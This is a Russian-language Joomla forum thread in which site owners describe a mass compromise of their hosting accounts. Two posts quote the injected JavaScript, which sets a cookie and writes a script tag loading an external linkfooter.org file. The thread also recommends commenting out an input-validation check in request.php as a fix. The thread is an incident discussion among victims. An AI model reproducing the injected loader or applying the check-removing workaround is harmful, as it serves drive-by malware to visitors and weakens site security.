0 Пользователей и 1 Гость просматривают эту тему.
  • 13 Ответов
  • 1705 Просмотров
*

ivankoby

  • Захожу иногда
  • 81
  • 1 / 0
Помогите, уважающие форумчане, легло более 10 сайтов на Joomla 1.5, расположенных на разных серверах одного хостинга - ошибка
"Illegal variable _files or _env or _get or _post or _cookie or _server or _session or globals passed to script."

Если делать хак с фалом request.php, то перестает работать админка и многие модули (походу перестают работать жаба скрипты jQuery и jQuery.ajax)

Помогите - три дня на смарку прошло, уже клиенты звонят и мозг выносят !
Продвижение и создание сайтов на joomla в Беларуси
*

fbr

  • Завсегдатай
  • 1392
  • 158 / 7
может на сервере версию php подняли?

*

ivankoby

  • Захожу иногда
  • 81
  • 1 / 0
говорят что нет! И что должно все лечь? установили и то не на все сервера mod_secyrity
Продвижение и создание сайтов на joomla в Беларуси
*

ivankoby

  • Захожу иногда
  • 81
  • 1 / 0
Яндекс вебмастер сообщил недавно о вирусах drive-by-download на сайтах причем даже не только на джумловских, но и на обычном HTML +жаба...
Продвижение и создание сайтов на joomla в Беларуси
*

voland

  • Легенда
  • 10343
  • 555 / 108
  • Эта строка съедает место на вашем мониторе
Яндекс вебмастер сообщил недавно о вирусах drive-by-download на сайтах причем даже не только на джумловских, но и на обычном HTML +жаба...

Ссылку?
И о какой жабе речь?
*

ivankoby

  • Захожу иногда
  • 81
  • 1 / 0
Ссылку?И о какой жабе речь?

жаба Lightbox (дата изменения сегодня), все js изменены на всех сайтах сегодня, ? взлом? - нет более ! более 10 акаунтов  сразными паролями
Продвижение и создание сайтов на joomla в Беларуси
*

ivankoby

  • Захожу иногда
  • 81
  • 1 / 0
взлом хостинга?
Продвижение и создание сайтов на joomla в Беларуси
*

ivankoby

  • Захожу иногда
  • 81
  • 1 / 0
function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000));
if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<script src="http://linkfooter.org/linkfooter.js"></script>');} дописано....
Продвижение и создание сайтов на joomla в Беларуси
*

voland

  • Легенда
  • 10343
  • 555 / 108
  • Эта строка съедает место на вашем мониторе

жаба Lightbox (дата изменения сегодня), все js изменены на всех сайтах сегодня, ? взлом? - нет более ! более 10 акаунтов  сразными паролями
Это не жаба, и даже не ява, а JavaScript.
Уязвимость в нем? Или тупо своровали пароли?
Думаю что последнее.
*

ivankoby

  • Захожу иногда
  • 81
  • 1 / 0
а другие хостинги?
Продвижение и создание сайтов на joomla в Беларуси
*

ivankoby

  • Захожу иногда
  • 81
  • 1 / 0
Все таки ломали походу Joomla с другого форума:
"5 декабря 2012 Коллеги, при попытке зайти на сайт появляется надпись Illegal variable _files or _env or _get or _post or _cookie or _server or _session or globals passed to script. что сие значит?" - http://forum.astrakhan.ru/index.php?s=6e4ff5482acd4e2cc82cf6066ab8d60b&showtopic=123113&pid=2361883&st=0&
Остается узнать, что за уязвимость и на каких серверах и настройках...
Продвижение и создание сайтов на joomla в Беларуси
*

Gotcha again

  • Новичок
  • 14
  • 0 / 0
Ага, и у меня такая же фигня.
IE и Mozilla нормально заходит, Opera говорит "Страница была замечена в распространении вредоносного программного обеспечения", Chrome выдает "Illegal variable _files or _env or _get or _post or _cookie or _server or _session or globals passed to script."

Хостер тоже говорит что атака была, восстановили из бекапа но безрезультатно.

Есть предположения как можно наладить?
*

ivankoby

  • Захожу иногда
  • 81
  • 1 / 0
очередная бессонная ночь - с хостером определили, что ломанули акаунт (вернее 14 аков - нужно было по шифрованному FTP (ftps) работать с сайтами), поэтому поменяли пароли сначала... Потом восстановили из бекапа (трех дневной давности), поменял пароли к доступу и после этого уже и сделал хак...

В файле request.php
libraries/joomla/environment/request.php
Строку:$failed |= is_numeric( $key );Закоментить


заработало
Продвижение и создание сайтов на joomla в Беларуси
*

Проектура

  • Новичок
  • 1
  • 0 / 0
У меня тоже самое, хостинг на агаве, правда сайт на DLE, во всех *.js файлов дописано в конце function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000));
if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<script src="http://linkfooter.org/linkfooter.js"></script>');}
Массово удалил, щас заливаю обратно. Не знаю поможет или нет.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

PHP Notice: Undefined variable: sub_main_suffix in

Автор Elimelech

Ответов: 16
Просмотров: 649
Последний ответ 23.12.2016, 12:29:37
от dmitry_stas
Undefined variable, прошу помощи, важный проект!

Автор Elimelech

Ответов: 15
Просмотров: 613
Последний ответ 22.12.2016, 12:42:23
от Elimelech
Favicon в поиске яндекса исчезли сразу со всех сайтов

Автор veblik

Ответов: 5
Просмотров: 1375
Последний ответ 12.12.2015, 14:42:13
от veblik
Как обновить Версия 1.5.22 на более новую версию.

Автор tretyak3000

Ответов: 1
Просмотров: 616
Последний ответ 04.06.2014, 08:56:32
от AlekVolsk
[Решено] Illegal variable _files or _env or _get or _post or _cookie or _server or _session or globa

Автор Xsing

Ответов: 6
Просмотров: 6400
Последний ответ 16.07.2013, 16:17:35
от RoooMka